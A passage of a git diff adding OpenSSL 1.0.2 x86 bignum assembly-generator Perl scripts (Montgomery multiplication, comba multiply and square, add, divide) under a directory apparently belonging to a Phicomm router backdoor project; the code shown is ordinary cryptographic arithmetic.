+	&adc	($j,0);
+	 &mov	("eax",&DWP(0,$inp));			# np[0]
+	&mov	(&DWP($frame+4,"esp",$num,4),"edx");	# tp[num]=
+	&mov	(&DWP($frame+8,"esp",$num,4),$j);	# tp[num+1]=
+
+	&mul	($word);				# np[0]*m
+	&add	("eax",&DWP($frame,"esp"));		# +=tp[0]
+	&mov	("eax",&DWP(4,$inp));			# np[1]
+	&adc	("edx",0);
+	&mov	($j,1);
+
+&set_label("2ndmadd",16);
+	&mov	($carry,"edx");
+	&mul	($word);				# np[j]*m
+	&add	($carry,&DWP($frame,"esp",$j,4));	# +=tp[j]
+	&lea	($j,&DWP(1,$j));
+	&adc	("edx",0);
+	&add	($carry,"eax");
+	&mov	("eax",&DWP(0,$inp,$j,4));		# np[j+1]
+	&adc	("edx",0);
+	&cmp	($j,$num);
+	&mov	(&DWP($frame-8,"esp",$j,4),$carry);	# tp[j-1]=
+	&jl	(&label("2ndmadd"));
+
+	&mov	($carry,"edx");
+	&mul	($word);				# np[j]*m
+	&add	($carry,&DWP($frame,"esp",$num,4));	# +=tp[num-1]
+	&adc	("edx",0);
+	&add	($carry,"eax");
+	&adc	("edx",0);
+	&mov	(&DWP($frame-4,"esp",$num,4),$carry);	# tp[num-2]=
+
+	&xor	("eax","eax");
+	 &mov	($j,$_bp);				# &bp[i]
+	&add	("edx",&DWP($frame+4,"esp",$num,4));	# carry+=tp[num]
+	&adc	("eax",&DWP($frame+8,"esp",$num,4));	# +=tp[num+1]
+	 &lea	($j,&DWP(4,$j));
+	&mov	(&DWP($frame,"esp",$num,4),"edx");	# tp[num-1]=
+	 &cmp	($j,$_bpend);
+	&mov	(&DWP($frame+4,"esp",$num,4),"eax");	# tp[num]=
+	&je	(&label("common_tail"));
+
+	&mov	($word,&DWP(0,$j));			# bp[i+1]
+	&mov	($inp,$_ap);
+	&mov	($_bp,$j);				# &bp[++i]
+	&xor	($j,$j);
+	&xor	("edx","edx");
+	&mov	("eax",&DWP(0,$inp));
+	&jmp	(&label("1stmadd"));
+
+&set_label("bn_sqr_mont",16);
+$sbit=$num;
+	&mov	($_num,$num);
+	&mov	($_bp,$j);				# i=0
+
+	&mov	("eax",$word);				# ap[0]
+	&mul	($word);				# ap[0]*ap[0]
+	&mov	(&DWP($frame,"esp"),"eax");		# tp[0]=
+	&mov	($sbit,"edx");
+	&shr	("edx",1);
+	&and	($sbit,1);
+	&inc	($j);
+&set_label("sqr",16);
+	&mov	("eax",&DWP(0,$inp,$j,4));		# ap[j]
+	&mov	($carry,"edx");
+	&mul	($word);				# ap[j]*ap[0]
+	&add	("eax",$carry);
+	&lea	($j,&DWP(1,$j));
+	&adc	("edx",0);
+	&lea	($carry,&DWP(0,$sbit,"eax",2));
+	&shr	("eax",31);
+	&cmp	($j,$_num);
+	&mov	($sbit,"eax");
+	&mov	(&DWP($frame-4,"esp",$j,4),$carry);	# tp[j]=
+	&jl	(&label("sqr"));
+
+	&mov	("eax",&DWP(0,$inp,$j,4));		# ap[num-1]
+	&mov	($carry,"edx");
+	&mul	($word);				# ap[num-1]*ap[0]
+	&add	("eax",$carry);
+	 &mov	($word,$_n0);
+	&adc	("edx",0);
+	 &mov	($inp,$_np);
+	&lea	($carry,&DWP(0,$sbit,"eax",2));
+	 &imul	($word,&DWP($frame,"esp"));		# n0*tp[0]
+	&shr	("eax",31);
+	&mov	(&DWP($frame,"esp",$j,4),$carry);	# tp[num-1]=
+
+	&lea	($carry,&DWP(0,"eax","edx",2));
+	 &mov	("eax",&DWP(0,$inp));			# np[0]
+	&shr	("edx",31);
+	&mov	(&DWP($frame+4,"esp",$j,4),$carry);	# tp[num]=
+	&mov	(&DWP($frame+8,"esp",$j,4),"edx");	# tp[num+1]=
+
+	&mul	($word);				# np[0]*m
+	&add	("eax",&DWP($frame,"esp"));		# +=tp[0]
+	&mov	($num,$j);
+	&adc	("edx",0);
+	&mov	("eax",&DWP(4,$inp));			# np[1]
+	&mov	($j,1);
+
+&set_label("3rdmadd",16);
+	&mov	($carry,"edx");
+	&mul	($word);				# np[j]*m
+	&add	($carry,&DWP($frame,"esp",$j,4));	# +=tp[j]
+	&adc	("edx",0);
+	&add	($carry,"eax");
+	&mov	("eax",&DWP(4,$inp,$j,4));		# np[j+1]
+	&adc	("edx",0);
+	&mov	(&DWP($frame-4,"esp",$j,4),$carry);	# tp[j-1]=
+
+	&mov	($carry,"edx");
+	&mul	($word);				# np[j+1]*m
+	&add	($carry,&DWP($frame+4,"esp",$j,4));	# +=tp[j+1]
+	&lea	($j,&DWP(2,$j));
+	&adc	("edx",0);
+	&add	($carry,"eax");
+	&mov	("eax",&DWP(0,$inp,$j,4));		# np[j+2]
+	&adc	("edx",0);
+	&cmp	($j,$num);
+	&mov	(&DWP($frame-8,"esp",$j,4),$carry);	# tp[j]=
+	&jl	(&label("3rdmadd"));
+
+	&mov	($carry,"edx");
+	&mul	($word);				# np[j]*m
+	&add	($carry,&DWP($frame,"esp",$num,4));	# +=tp[num-1]
+	&adc	("edx",0);
+	&add	($carry,"eax");
+	&adc	("edx",0);
+	&mov	(&DWP($frame-4,"esp",$num,4),$carry);	# tp[num-2]=
+
+	&mov	($j,$_bp);				# i
+	&xor	("eax","eax");
+	&mov	($inp,$_ap);
+	&add	("edx",&DWP($frame+4,"esp",$num,4));	# carry+=tp[num]
+	&adc	("eax",&DWP($frame+8,"esp",$num,4));	# +=tp[num+1]
+	&mov	(&DWP($frame,"esp",$num,4),"edx");	# tp[num-1]=
+	&cmp	($j,$num);
+	&mov	(&DWP($frame+4,"esp",$num,4),"eax");	# tp[num]=
+	&je	(&label("common_tail"));
+
+	&mov	($word,&DWP(4,$inp,$j,4));		# ap[i]
+	&lea	($j,&DWP(1,$j));
+	&mov	("eax",$word);
+	&mov	($_bp,$j);				# ++i
+	&mul	($word);				# ap[i]*ap[i]
+	&add	("eax",&DWP($frame,"esp",$j,4));	# +=tp[i]
+	&adc	("edx",0);
+	&mov	(&DWP($frame,"esp",$j,4),"eax");	# tp[i]=
+	&xor	($carry,$carry);
+	&cmp	($j,$num);
+	&lea	($j,&DWP(1,$j));
+	&je	(&label("sqrlast"));
+
+	&mov	($sbit,"edx");				# zaps $num
+	&shr	("edx",1);
+	&and	($sbit,1);
+&set_label("sqradd",16);
+	&mov	("eax",&DWP(0,$inp,$j,4));		# ap[j]
+	&mov	($carry,"edx");
+	&mul	($word);				# ap[j]*ap[i]
+	&add	("eax",$carry);
+	&lea	($carry,&DWP(0,"eax","eax"));
+	&adc	("edx",0);
+	&shr	("eax",31);
+	&add	($carry,&DWP($frame,"esp",$j,4));	# +=tp[j]
+	&lea	($j,&DWP(1,$j));
+	&adc	("eax",0);
+	&add	($carry,$sbit);
+	&adc	("eax",0);
+	&cmp	($j,$_num);
+	&mov	(&DWP($frame-4,"esp",$j,4),$carry);	# tp[j]=
+	&mov	($sbit,"eax");
+	&jle	(&label("sqradd"));
+
+	&mov	($carry,"edx");
+	&add	("edx","edx");
+	&shr	($carry,31);
+	&add	("edx",$sbit);
+	&adc	($carry,0);
+&set_label("sqrlast");
+	&mov	($word,$_n0);
+	&mov	($inp,$_np);
+	&imul	($word,&DWP($frame,"esp"));		# n0*tp[0]
+
+	&add	("edx",&DWP($frame,"esp",$j,4));	# +=tp[num]
+	&mov	("eax",&DWP(0,$inp));			# np[0]
+	&adc	($carry,0);
+	&mov	(&DWP($frame,"esp",$j,4),"edx");	# tp[num]=
+	&mov	(&DWP($frame+4,"esp",$j,4),$carry);	# tp[num+1]=
+
+	&mul	($word);				# np[0]*m
+	&add	("eax",&DWP($frame,"esp"));		# +=tp[0]
+	&lea	($num,&DWP(-1,$j));
+	&adc	("edx",0);
+	&mov	($j,1);
+	&mov	("eax",&DWP(4,$inp));			# np[1]
+
+	&jmp	(&label("3rdmadd"));
+}
+
+&set_label("common_tail",16);
+	&mov	($np,$_np);			# load modulus pointer
+	&mov	($rp,$_rp);			# load result pointer
+	&lea	($tp,&DWP($frame,"esp"));	# [$ap and $bp are zapped]
+
+	&mov	("eax",&DWP(0,$tp));		# tp[0]
+	&mov	($j,$num);			# j=num-1
+	&xor	($i,$i);			# i=0 and clear CF!
+
+&set_label("sub",16);
+	&sbb	("eax",&DWP(0,$np,$i,4));
+	&mov	(&DWP(0,$rp,$i,4),"eax");	# rp[i]=tp[i]-np[i]
+	&dec	($j);				# doesn't affect CF!
+	&mov	("eax",&DWP(4,$tp,$i,4));	# tp[i+1]
+	&lea	($i,&DWP(1,$i));		# i++
+	&jge	(&label("sub"));
+
+	&sbb	("eax",0);			# handle upmost overflow bit
+	&and	($tp,"eax");
+	&not	("eax");
+	&mov	($np,$rp);
+	&and	($np,"eax");
+	&or	($tp,$np);			# tp=carry?tp:rp
+
+&set_label("copy",16);				# copy or in-place refresh
+	&mov	("eax",&DWP(0,$tp,$num,4));
+	&mov	(&DWP(0,$rp,$num,4),"eax");	# rp[i]=tp[i]
+	&mov	(&DWP($frame,"esp",$num,4),$j);	# zap temporary vector
+	&dec	($num);
+	&jge	(&label("copy"));
+
+	&mov	("esp",$_sp);		# pull saved stack pointer
+	&mov	("eax",1);
+&set_label("just_leave");
+&function_end("bn_mul_mont");
+
+&asciz("Montgomery Multiplication for x86, CRYPTOGAMS by <appro\@openssl.org>");
+
+&asm_finish();
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86.pl
new file mode 100644
index 0000000..1bc4f1b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86.pl
@@ -0,0 +1,28 @@
+#!/usr/local/bin/perl
+
+push(@INC,"perlasm","../../perlasm");
+require "x86asm.pl";
+
+require("x86/mul_add.pl");
+require("x86/mul.pl");
+require("x86/sqr.pl");
+require("x86/div.pl");
+require("x86/add.pl");
+require("x86/sub.pl");
+require("x86/comba.pl");
+
+&asm_init($ARGV[0],$0);
+
+&bn_mul_add_words("bn_mul_add_words");
+&bn_mul_words("bn_mul_words");
+&bn_sqr_words("bn_sqr_words");
+&bn_div_words("bn_div_words");
+&bn_add_words("bn_add_words");
+&bn_sub_words("bn_sub_words");
+&bn_mul_comba("bn_mul_comba8",8);
+&bn_mul_comba("bn_mul_comba4",4);
+&bn_sqr_comba("bn_sqr_comba8",8);
+&bn_sqr_comba("bn_sqr_comba4",4);
+
+&asm_finish();
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/add.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/add.pl
new file mode 100644
index 0000000..0b5cf58
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/add.pl
@@ -0,0 +1,76 @@
+#!/usr/local/bin/perl
+# x86 assember
+
+sub bn_add_words
+	{
+	local($name)=@_;
+
+	&function_begin($name,"");
+
+	&comment("");
+	$a="esi";
+	$b="edi";
+	$c="eax";
+	$r="ebx";
+	$tmp1="ecx";
+	$tmp2="edx";
+	$num="ebp";
+
+	&mov($r,&wparam(0));	# get r
+	 &mov($a,&wparam(1));	# get a
+	&mov($b,&wparam(2));	# get b
+	 &mov($num,&wparam(3));	# get num
+	&xor($c,$c);		# clear carry
+	 &and($num,0xfffffff8);	# num / 8
+
+	&jz(&label("aw_finish"));
+
+	&set_label("aw_loop",0);
+	for ($i=0; $i<8; $i++)
+		{
+		&comment("Round $i");
+
+		&mov($tmp1,&DWP($i*4,$a,"",0)); 	# *a
+		 &mov($tmp2,&DWP($i*4,$b,"",0)); 	# *b
+		&add($tmp1,$c);
+		 &mov($c,0);
+		&adc($c,$c);
+		 &add($tmp1,$tmp2);
+		&adc($c,0);
+		 &mov(&DWP($i*4,$r,"",0),$tmp1); 	# *r
+		}
+
+	&comment("");
+	&add($a,32);
+	 &add($b,32);
+	&add($r,32);
+	 &sub($num,8);
+	&jnz(&label("aw_loop"));
+
+	&set_label("aw_finish",0);
+	&mov($num,&wparam(3));	# get num
+	&and($num,7);
+	 &jz(&label("aw_end"));
+
+	for ($i=0; $i<7; $i++)
+		{
+		&comment("Tail Round $i");
+		&mov($tmp1,&DWP($i*4,$a,"",0));	# *a
+		 &mov($tmp2,&DWP($i*4,$b,"",0));# *b
+		&add($tmp1,$c);
+		 &mov($c,0);
+		&adc($c,$c);
+		 &add($tmp1,$tmp2);
+		&adc($c,0);
+		 &dec($num) if ($i != 6);
+		&mov(&DWP($i*4,$r,"",0),$tmp1);	# *a
+		 &jz(&label("aw_end")) if ($i != 6);
+		}
+	&set_label("aw_end",0);
+
+#	&mov("eax",$c);		# $c is "eax"
+
+	&function_end($name);
+	}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/comba.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/comba.pl
new file mode 100644
index 0000000..2291253
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/comba.pl
@@ -0,0 +1,277 @@
+#!/usr/local/bin/perl
+# x86 assember
+
+sub mul_add_c
+	{
+	local($a,$ai,$b,$bi,$c0,$c1,$c2,$pos,$i,$na,$nb)=@_;
+
+	# pos == -1 if eax and edx are pre-loaded, 0 to load from next
+	# words, and 1 if load return value
+
+	&comment("mul a[$ai]*b[$bi]");
+
+	# "eax" and "edx" will always be pre-loaded.
+	# &mov("eax",&DWP($ai*4,$a,"",0)) ;
+	# &mov("edx",&DWP($bi*4,$b,"",0));
+
+	&mul("edx");
+	&add($c0,"eax");
+	 &mov("eax",&DWP(($na)*4,$a,"",0)) if $pos == 0;	# laod next a
+	 &mov("eax",&wparam(0)) if $pos > 0;			# load r[]
+	 ###
+	&adc($c1,"edx");
+	 &mov("edx",&DWP(($nb)*4,$b,"",0)) if $pos == 0;	# laod next b
+	 &mov("edx",&DWP(($nb)*4,$b,"",0)) if $pos == 1;	# laod next b
+	 ###
+	&adc($c2,0);
+	 # is pos > 1, it means it is the last loop 
+	 &mov(&DWP($i*4,"eax","",0),$c0) if $pos > 0;		# save r[];
+	&mov("eax",&DWP(($na)*4,$a,"",0)) if $pos == 1;		# laod next a
+	}
+
+sub sqr_add_c
+	{
+	local($r,$a,$ai,$bi,$c0,$c1,$c2,$pos,$i,$na,$nb)=@_;
+
+	# pos == -1 if eax and edx are pre-loaded, 0 to load from next
+	# words, and 1 if load return value
+
+	&comment("sqr a[$ai]*a[$bi]");
+
+	# "eax" and "edx" will always be pre-loaded.
+	# &mov("eax",&DWP($ai*4,$a,"",0)) ;
+	# &mov("edx",&DWP($bi*4,$b,"",0));
+
+	if ($ai == $bi)
+		{ &mul("eax");}
+	else
+		{ &mul("edx");}
+	&add($c0,"eax");
+	 &mov("eax",&DWP(($na)*4,$a,"",0)) if $pos == 0;	# load next a
+	 ###
+	&adc($c1,"edx");
+	 &mov("edx",&DWP(($nb)*4,$a,"",0)) if ($pos == 1) && ($na != $nb);
+	 ###
+	&adc($c2,0);
+	 # is pos > 1, it means it is the last loop 
+	 &mov(&DWP($i*4,$r,"",0),$c0) if $pos > 0;		# save r[];
+	&mov("eax",&DWP(($na)*4,$a,"",0)) if $pos == 1;		# load next b
+	}
+
+sub sqr_add_c2
+	{
+	local($r,$a,$ai,$bi,$c0,$c1,$c2,$pos,$i,$na,$nb)=@_;
+
+	# pos == -1 if eax and edx are pre-loaded, 0 to load from next
+	# words, and 1 if load return value
+
+	&comment("sqr a[$ai]*a[$bi]");
+
+	# "eax" and "edx" will always be pre-loaded.
+	# &mov("eax",&DWP($ai*4,$a,"",0)) ;
+	# &mov("edx",&DWP($bi*4,$a,"",0));
+
+	if ($ai == $bi)
+		{ &mul("eax");}
+	else
+		{ &mul("edx");}
+	&add("eax","eax");
+	 ###
+	&adc("edx","edx");
+	 ###
+	&adc($c2,0);
+	 &add($c0,"eax");
+	&adc($c1,"edx");
+	 &mov("eax",&DWP(($na)*4,$a,"",0)) if $pos == 0;	# load next a
+	 &mov("eax",&DWP(($na)*4,$a,"",0)) if $pos == 1;	# load next b
+	&adc($c2,0);
+	&mov(&DWP($i*4,$r,"",0),$c0) if $pos > 0;		# save r[];
+	 &mov("edx",&DWP(($nb)*4,$a,"",0)) if ($pos <= 1) && ($na != $nb);
+	 ###
+	}
+
+sub bn_mul_comba
+	{
+	local($name,$num)=@_;
+	local($a,$b,$c0,$c1,$c2);
+	local($i,$as,$ae,$bs,$be,$ai,$bi);
+	local($tot,$end);
+
+	&function_begin_B($name,"");
+
+	$c0="ebx";
+	$c1="ecx";
+	$c2="ebp";
+	$a="esi";
+	$b="edi";
+	
+	$as=0;
+	$ae=0;
+	$bs=0;
+	$be=0;
+	$tot=$num+$num-1;
+
+	&push("esi");
+	 &mov($a,&wparam(1));
+	&push("edi");
+	 &mov($b,&wparam(2));
+	&push("ebp");
+	 &push("ebx");
+
+	&xor($c0,$c0);
+	 &mov("eax",&DWP(0,$a,"",0));	# load the first word 
+	&xor($c1,$c1);
+	 &mov("edx",&DWP(0,$b,"",0));	# load the first second 
+
+	for ($i=0; $i<$tot; $i++)
+		{
+		$ai=$as;
+		$bi=$bs;
+		$end=$be+1;
+
+		&comment("################## Calculate word $i"); 
+
+		for ($j=$bs; $j<$end; $j++)
+			{
+			&xor($c2,$c2) if ($j == $bs);
+			if (($j+1) == $end)
+				{
+				$v=1;
+				$v=2 if (($i+1) == $tot);
+				}
+			else
+				{ $v=0; }
+			if (($j+1) != $end)
+				{
+				$na=($ai-1);
+				$nb=($bi+1);
+				}
+			else
+				{
+				$na=$as+($i < ($num-1));
+				$nb=$bs+($i >= ($num-1));
+				}
+#printf STDERR "[$ai,$bi] -> [$na,$nb]\n";
+			&mul_add_c($a,$ai,$b,$bi,$c0,$c1,$c2,$v,$i,$na,$nb);
+			if ($v)
+				{
+				&comment("saved r[$i]");
+				# &mov("eax",&wparam(0));
+				# &mov(&DWP($i*4,"eax","",0),$c0);
+				($c0,$c1,$c2)=($c1,$c2,$c0);
+				}
+			$ai--;
+			$bi++;
+			}
+		$as++ if ($i < ($num-1));
+		$ae++ if ($i >= ($num-1));
+
+		$bs++ if ($i >= ($num-1));
+		$be++ if ($i < ($num-1));
+		}
+	&comment("save r[$i]");
+	# &mov("eax",&wparam(0));
+	&mov(&DWP($i*4,"eax","",0),$c0);
+
+	&pop("ebx");
+	&pop("ebp");
+	&pop("edi");
+	&pop("esi");
+	&ret();
+	&function_end_B($name);
+	}
+
+sub bn_sqr_comba
+	{
+	local($name,$num)=@_;
+	local($r,$a,$c0,$c1,$c2)=@_;
+	local($i,$as,$ae,$bs,$be,$ai,$bi);
+	local($b,$tot,$end,$half);
+
+	&function_begin_B($name,"");
+
+	$c0="ebx";
+	$c1="ecx";
+	$c2="ebp";
+	$a="esi";
+	$r="edi";
+
+	&push("esi");
+	 &push("edi");
+	&push("ebp");
+	 &push("ebx");
+	&mov($r,&wparam(0));
+	 &mov($a,&wparam(1));
+	&xor($c0,$c0);
+	 &xor($c1,$c1);
+	&mov("eax",&DWP(0,$a,"",0)); # load the first word
+
+	$as=0;
+	$ae=0;
+	$bs=0;
+	$be=0;
+	$tot=$num+$num-1;
+
+	for ($i=0; $i<$tot; $i++)
+		{
+		$ai=$as;
+		$bi=$bs;
+		$end=$be+1;
+
+		&comment("############### Calculate word $i");
+		for ($j=$bs; $j<$end; $j++)
+			{
+			&xor($c2,$c2) if ($j == $bs);
+			if (($ai-1) < ($bi+1))
+				{
+				$v=1;
+				$v=2 if ($i+1) == $tot;
+				}
+			else
+				{ $v=0; }
+			if (!$v)
+				{
+				$na=$ai-1;
+				$nb=$bi+1;
+				}
+			else
+				{
+				$na=$as+($i < ($num-1));
+				$nb=$bs+($i >= ($num-1));
+				}
+			if ($ai == $bi)
+				{
+				&sqr_add_c($r,$a,$ai,$bi,
+					$c0,$c1,$c2,$v,$i,$na,$nb);
+				}
+			else
+				{
+				&sqr_add_c2($r,$a,$ai,$bi,
+					$c0,$c1,$c2,$v,$i,$na,$nb);
+				}
+			if ($v)
+				{
+				&comment("saved r[$i]");
+				#&mov(&DWP($i*4,$r,"",0),$c0);
+				($c0,$c1,$c2)=($c1,$c2,$c0);
+				last;
+				}
+			$ai--;
+			$bi++;
+			}
+		$as++ if ($i < ($num-1));
+		$ae++ if ($i >= ($num-1));
+
+		$bs++ if ($i >= ($num-1));
+		$be++ if ($i < ($num-1));
+		}
+	&mov(&DWP($i*4,$r,"",0),$c0);
+	&pop("ebx");
+	&pop("ebp");
+	&pop("edi");
+	&pop("esi");
+	&ret();
+	&function_end_B($name);
+	}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/div.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/div.pl
new file mode 100644
index 0000000..0e90152
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/div.pl
@@ -0,0 +1,15 @@
+#!/usr/local/bin/perl
+# x86 assember
+
+sub bn_div_words
+	{
+	local($name)=@_;
+
+	&function_begin($name,"");
+	&mov("edx",&wparam(0));	#
+	&mov("eax",&wparam(1));	#
+	&mov("ebx",&wparam(2));	#
+	&div("ebx");
+	&function_end($name);
+	}
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/f b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/f
new file mode 100644
index 0000000..22e4112
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/f
@@ -0,0 +1,3 @@
+#!/usr/local/bin/perl
+# x86 assember
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/mul.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/mul.pl
new file mode 100644
index 0000000..674cb9b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/mul.pl
@@ -0,0 +1,77 @@
+#!/usr/local/bin/perl
+# x86 assember
+
+sub bn_mul_words
+	{
+	local($name)=@_;
+
+	&function_begin($name,"");
+
+	&comment("");
+	$Low="eax";
+	$High="edx";
+	$a="ebx";
+	$w="ecx";
+	$r="edi";
+	$c="esi";
+	$num="ebp";
+
+	&xor($c,$c);		# clear carry
+	&mov($r,&wparam(0));	#
+	&mov($a,&wparam(1));	#
+	&mov($num,&wparam(2));	#
+	&mov($w,&wparam(3));	#
+
+	&and($num,0xfffffff8);	# num / 8
+	&jz(&label("mw_finish"));
+
+	&set_label("mw_loop",0);
+	for ($i=0; $i<32; $i+=4)
+		{
+		&comment("Round $i");
+
+		 &mov("eax",&DWP($i,$a,"",0)); 	# *a
+		&mul($w);			# *a * w
+		&add("eax",$c);			# L(t)+=c
+		 # XXX
+
+		&adc("edx",0);			# H(t)+=carry
+		 &mov(&DWP($i,$r,"",0),"eax");	# *r= L(t);
+
+		&mov($c,"edx");			# c=  H(t);
+		}
+
+	&comment("");
+	&add($a,32);
+	&add($r,32);
+	&sub($num,8);
+	&jz(&label("mw_finish"));
+	&jmp(&label("mw_loop"));
+
+	&set_label("mw_finish",0);
+	&mov($num,&wparam(2));	# get num
+	&and($num,7);
+	&jnz(&label("mw_finish2"));
+	&jmp(&label("mw_end"));
+
+	&set_label("mw_finish2",1);
+	for ($i=0; $i<7; $i++)
+		{
+		&comment("Tail Round $i");
+		 &mov("eax",&DWP($i*4,$a,"",0));# *a
+		&mul($w);			# *a * w
+		&add("eax",$c);			# L(t)+=c
+		 # XXX
+		&adc("edx",0);			# H(t)+=carry
+		 &mov(&DWP($i*4,$r,"",0),"eax");# *r= L(t);
+		&mov($c,"edx");			# c=  H(t);
+		 &dec($num) if ($i != 7-1);
+		&jz(&label("mw_end")) if ($i != 7-1);
+		}
+	&set_label("mw_end",0);
+	&mov("eax",$c);
+
+	&function_end($name);
+	}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/mul_add.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/mul_add.pl
new file mode 100644
index 0000000..61830d3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/mul_add.pl
@@ -0,0 +1,87 @@
+#!/usr/local/bin/perl
+# x86 assember
+
+sub bn_mul_add_words
+	{
+	local($name)=@_;
+
+	&function_begin($name,"");
+
+	&comment("");
+	$Low="eax";
+	$High="edx";
+	$a="ebx";
+	$w="ebp";
+	$r="edi";
+	$c="esi";
+
+	&xor($c,$c);		# clear carry
+	&mov($r,&wparam(0));	#
+
+	&mov("ecx",&wparam(2));	#
+	&mov($a,&wparam(1));	#
+
+	&and("ecx",0xfffffff8);	# num / 8
+	&mov($w,&wparam(3));	#
+
+	&push("ecx");		# Up the stack for a tmp variable
+
+	&jz(&label("maw_finish"));
+
+	&set_label("maw_loop",0);
+
+	&mov(&swtmp(0),"ecx");	#
+
+	for ($i=0; $i<32; $i+=4)
+		{
+		&comment("Round $i");
+
+		 &mov("eax",&DWP($i,$a,"",0)); 	# *a
+		&mul($w);			# *a * w
+		&add("eax",$c);		# L(t)+= *r
+		 &mov($c,&DWP($i,$r,"",0));	# L(t)+= *r
+		&adc("edx",0);			# H(t)+=carry
+		 &add("eax",$c);		# L(t)+=c
+		&adc("edx",0);			# H(t)+=carry
+		 &mov(&DWP($i,$r,"",0),"eax");	# *r= L(t);
+		&mov($c,"edx");			# c=  H(t);
+		}
+
+	&comment("");
+	&mov("ecx",&swtmp(0));	#
+	&add($a,32);
+	&add($r,32);
+	&sub("ecx",8);
+	&jnz(&label("maw_loop"));
+
+	&set_label("maw_finish",0);
+	&mov("ecx",&wparam(2));	# get num
+	&and("ecx",7);
+	&jnz(&label("maw_finish2"));	# helps branch prediction
+	&jmp(&label("maw_end"));
+
+	&set_label("maw_finish2",1);
+	for ($i=0; $i<7; $i++)
+		{
+		&comment("Tail Round $i");
+		 &mov("eax",&DWP($i*4,$a,"",0));# *a
+		&mul($w);			# *a * w
+		&add("eax",$c);			# L(t)+=c
+		 &mov($c,&DWP($i*4,$r,"",0));	# L(t)+= *r
+		&adc("edx",0);			# H(t)+=carry
+		 &add("eax",$c);
+		&adc("edx",0);			# H(t)+=carry
+		 &dec("ecx") if ($i != 7-1);
+		&mov(&DWP($i*4,$r,"",0),"eax");	# *r= L(t);
+		 &mov($c,"edx");			# c=  H(t);
+		&jz(&label("maw_end")) if ($i != 7-1);
+		}
+	&set_label("maw_end",0);
+	&mov("eax",$c);
+
+	&pop("ecx");	# clear variable from
+
+	&function_end($name);
+	}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/sqr.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/sqr.pl
new file mode 100644
index 0000000..1f90993
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/sqr.pl
@@ -0,0 +1,60 @@
+#!/usr/local/bin/perl
+# x86 assember
+
+sub bn_sqr_words
+	{
+	local($name)=@_;
+
+	&function_begin($name,"");
+
+	&comment("");
+	$r="esi";
+	$a="edi";
+	$num="ebx";
+
+	&mov($r,&wparam(0));	#
+	&mov($a,&wparam(1));	#
+	&mov($num,&wparam(2));	#
+
+	&and($num,0xfffffff8);	# num / 8
+	&jz(&label("sw_finish"));
+
+	&set_label("sw_loop",0);
+	for ($i=0; $i<32; $i+=4)
+		{
+		&comment("Round $i");
+		&mov("eax",&DWP($i,$a,"",0)); 	# *a
+		 # XXX
+		&mul("eax");			# *a * *a
+		&mov(&DWP($i*2,$r,"",0),"eax");	#
+		 &mov(&DWP($i*2+4,$r,"",0),"edx");#
+		}
+
+	&comment("");
+	&add($a,32);
+	&add($r,64);
+	&sub($num,8);
+	&jnz(&label("sw_loop"));
+
+	&set_label("sw_finish",0);
+	&mov($num,&wparam(2));	# get num
+	&and($num,7);
+	&jz(&label("sw_end"));
+
+	for ($i=0; $i<7; $i++)
+		{
+		&comment("Tail Round $i");
+		&mov("eax",&DWP($i*4,$a,"",0));	# *a
+		 # XXX
+		&mul("eax");			# *a * *a
+		&mov(&DWP($i*8,$r,"",0),"eax");	#
+		 &dec($num) if ($i != 7-1);
+		&mov(&DWP($i*8+4,$r,"",0),"edx");
+		 &jz(&label("sw_end")) if ($i != 7-1);
+		}
+	&set_label("sw_end",0);
+
+	&function_end($name);
+	}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/sub.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/sub.pl
new file mode 100644
index 0000000..837b0e1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86/sub.pl
@@ -0,0 +1,76 @@
+#!/usr/local/bin/perl
+# x86 assember
+
+sub bn_sub_words
+	{
+	local($name)=@_;
+
+	&function_begin($name,"");
+
+	&comment("");
+	$a="esi";
+	$b="edi";
+	$c="eax";
+	$r="ebx";
+	$tmp1="ecx";
